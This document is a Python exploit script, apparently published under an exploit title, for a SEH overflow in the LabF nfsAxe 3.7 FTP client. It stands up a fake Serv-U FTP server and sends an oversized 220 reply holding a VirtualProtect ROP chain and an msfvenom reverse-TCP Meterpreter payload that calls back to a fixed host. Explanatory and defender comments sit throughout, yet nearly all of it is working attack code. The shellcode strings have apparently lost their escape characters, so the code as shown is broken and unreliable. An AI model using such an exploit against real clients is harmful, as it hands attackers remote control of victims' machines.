#!/usr/bin/env python
#
# Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass)
# Date : 12/8/2017
# Exploit Author : wetw0rk
# Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html
# Software link : http://www.labf.com/download/nfsaxe.exe
# Version : 3.7
# Tested on : Windows 7 (x86)
# Description : Upon connection the victim is sent a specially crafted buffer
# overwriting the SEH record, resulting in code execution.
#
# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly)
#
# Trigger the vulnerability by :
# Login as -> [check] anonymous -> connect
#

import struct, socket

# Listener address and port for the rogue FTP server.  0.0.0.0 binds every
# local interface; 21 is the standard FTP control port, so a client pointed at
# this machine with default settings reaches the listener below.
host = "0.0.0.0"
port = 21

# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp
# -f python -b "x00x0ax10" -v shellcode --smallest
#
# Second-stage payload, appended directly after the ROP chain when the buffer
# is assembled further down.  Per the command above it is a Windows
# reverse-TCP Meterpreter stager, encoded to avoid the bytes named after -b
# and emitted by msfvenom as Python string fragments; the callback
# host/port are baked in, so the bytes are specific to that generation run.
shellcode = ""
shellcode += "x2bxc9x66xb9x18x01xe8xffxffxffxffxc1"
shellcode += "x5ex30x4cx0ex07xe2xfaxfdxeax81x04x05"
shellcode += "x06x67x81xecx3bxcbx68x86x5ex3fx9bx43"
shellcode += "x1ex98x46x01x9dx65x30x16xadx51x3ax2c"
shellcode += "xe1xb3x1cx40x5ex21x08x05xe7xe8x25x28"
shellcode += "xedxc9xdex7fx79xa4x62x21xb9x79x08xbe"
shellcode += "x7ax26x40xdax72x3axedx6cxb5x66x60x40"
shellcode += "x91xc8x0dx5dxa5x7dx01xc2x7exc0x4dx9b"
shellcode += "x7fxb0xfcx90x9dx5ex55x92x6exb7x2dxaf"
shellcode += "x59x26xa4x66x23x7bx15x85x3axe8x3cx41"
shellcode += "x67xb4x0exe2x66x20xe7x35x72x6exa3xfa"
shellcode += "x76xf8x75xa5xffx33x5cx5dx21x20x1dx24"
shellcode += "x24x2ex7fx61xddxdcxdex0ex94x6cx05xd4"
shellcode += "xe2xb8xbex8dx8exe7xe7xe2xa0xccxc0xfd"
shellcode += "xdaxe0xbex9ex65x4ex24x0dx9fx9fxa0x88"
shellcode += "x66xf7xf4xcdx8fx27xc3xa9x55x7exc6xa7"
shellcode += "xc6x6fx18xb1xbexdbxb6xb5xb6x95x31x5f"
shellcode += "xeaxebxecxedxfexefx80x91xaax29xcbx1a"
shellcode += "x26x38x1dx5exa0xdbx9ax9axa6x56x75xa5"
shellcode += "xb3x2cx01x50x16xa3xd4x26x94xd3xa9x31"
shellcode += "xb6x2fx55x43xb4x1cx31x8fxe6x8dxecxbf"
shellcode += "xbdx83xeex34x26xb0x0fx24x79xc5x9exb5"
shellcode += "x9exf7xe8xf9xfaxadx96xfdx96xa7xa4x52"
shellcode += "xe7xfcxd1x96x55x6dx08x5fx59x5cx64x0f"
shellcode += "xd7xc7x4fxeexc7x12xd7x3cxd0x62xf6xda"

def create_rop_chain():
    """Return the ROP chain as a string of packed little-endian 32-bit values.

    The gadget list was produced by mona.py (links below); each entry is
    annotated with the instruction sequence at that address, and all of the
    annotated ones are attributed to msvcr71.dll.  Read together, the
    annotations describe a PUSHAD-style call into VirtualProtect(): the two
    constants that are NEG'd become 0x201 (annotated as dwSize) and 0x40
    (presumably the new protection value), and the final 'push esp # ret'
    pointer returns into whatever the caller places after the chain.  This
    is the DEP bypass named in the header.

    Every address is an absolute, hard-coded value, so the chain only works
    if msvcr71.dll is mapped at the base these were taken from; loading that
    module with ASLR would invalidate all of them, which is the mitigation
    this construction depends on being absent.

    Returns:
        The gadget addresses concatenated in list order, 4 bytes each.
    """
    # https://www.corelan.be/index.php/security/corelan-ropdb/
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
        0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
        0x7c3415a2, # JMP [EAX] [msvcr71.dll]
        0xffffffff, #
        0x7c376402, # skip 4 bytes [msvcr71.dll]
        0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
        0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
        0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
        0x7c344f87, # POP EDX # RETN [msvcr71.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
        0x7c34d201, # POP ECX # RETN [msvcr71.dll]
        0x7c38b001, # &Writable location [msvcr71.dll]
        0x7c347f97, # POP EAX # RETN [msvcr71.dll]
        0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
        0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
        0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
    ]
    # '<I' = little-endian unsigned 32-bit, matching x86 stack layout.
    # Style note: `_` conventionally marks an unused variable; `gadget` would
    # read better here since the value is used.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# Assemble the overflow buffer.  Layout, left to right, with sizes taken from
# the arithmetic below:
#
#   off2ROP (212) | rop_chain + padding + shellcode | off2nSEH filler
#   | nSEH (4) | SEH (4) | trigger
#
# off2nSEH is sized so that everything before nSEH is exactly 9391 bytes, so
# nSEH sits at offset 9391 and SEH at 9395 (9399 = 9391 + 4 + 4), and the
# trigger filler brings the whole thing to 10000 bytes.  The SEH slot holds a
# gadget address attributed to WCMDPA10.dll whose annotation (ADD ESP,61C then
# five POPs and RETN) is a stack pivot; presumably it moves ESP back onto the
# ROP chain placed at the start of the buffer — that is not verifiable here.
#
# Defender notes: SafeSEH/SEHOP would reject the overwritten handler, and an
# ASLR-enabled WCMDPA10.dll would invalidate the fixed SEH address; on the
# wire, a ~10 KB "220" reply line is far outside any legitimate FTP response.
rop_chain = create_rop_chain()
rop_chain += "x90" * 20            # padding between the chain and the shellcode
rop_chain += shellcode
off2ROP = "B" * 212 # offset to the start of our ROP chain
off2nSEH = "A" * (9391- ( # offset the nSEH and adjustments
    len(off2ROP) + len(rop_chain) # account for shellcode and offset
    )
)
nSEH = "BBBB" # SEH will be the start of the stack pivot
SEH = struct.pack('<L', 0x68034468) # ADD ESP,61C # POP # POP # POP # POP # POP # RETN [WCMDPA10.dll]
trigger = "C" * (10000 - ( # fill buffer to trigger vulnerability
    9399 # offset + nSEH + SEH
    )
)

buffer = off2ROP + rop_chain + off2nSEH + nSEH + SEH + trigger
# The buffer is delivered inside a line shaped like an FTP 220 reply, which
# is the message the client parses when this overflow is triggered.
payload = "220 %s is current directory " % (buffer)

# Start the TCP listener.  NOTE(review): the bare `except:` also swallows
# KeyboardInterrupt and discards the real bind error (port in use, missing
# privilege, ...); `except socket.error` would be the narrow catch, and
# printing the exception would say why the bind failed.
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, port))
    sock.listen(20)
    # Python 2 print-statement form: the %-formatting applies to the
    # parenthesised string before it is printed.
    print("[*] server listening on %s:%d") % (host, port)
except:
    print("[-] failed to bind the server exiting...")
    exit()

# Accept loop: for each client, play a minimal FTP login dialogue (banner,
# 331, 230), reading and discarding whatever the client sends in between,
# then deliver the oversized 220 line built above.  The loop has no exit
# condition.  Each conn.recv(1024) return value is ignored, so the server
# does not check what the client actually sent before the next step.
while True:
    conn, addr = sock.accept()
    print("[*] connection from %s:%d") % (addr[0], addr[1])
    print("[+] sending %d bytes to target host" % (len(buffer)))
    # Banner impersonating Serv-U 6.0; the replies that follow accept any
    # credentials, consistent with the anonymous-login trigger in the header.
    conn.send('220 Welcome Serv-U FTP Server v6.0 for WinSock ready... ')
    conn.recv(1024)
    conn.send('331 OK ')
    conn.recv(1024)
    conn.send('230 OK ')
    conn.recv(1024)
    conn.send(payload)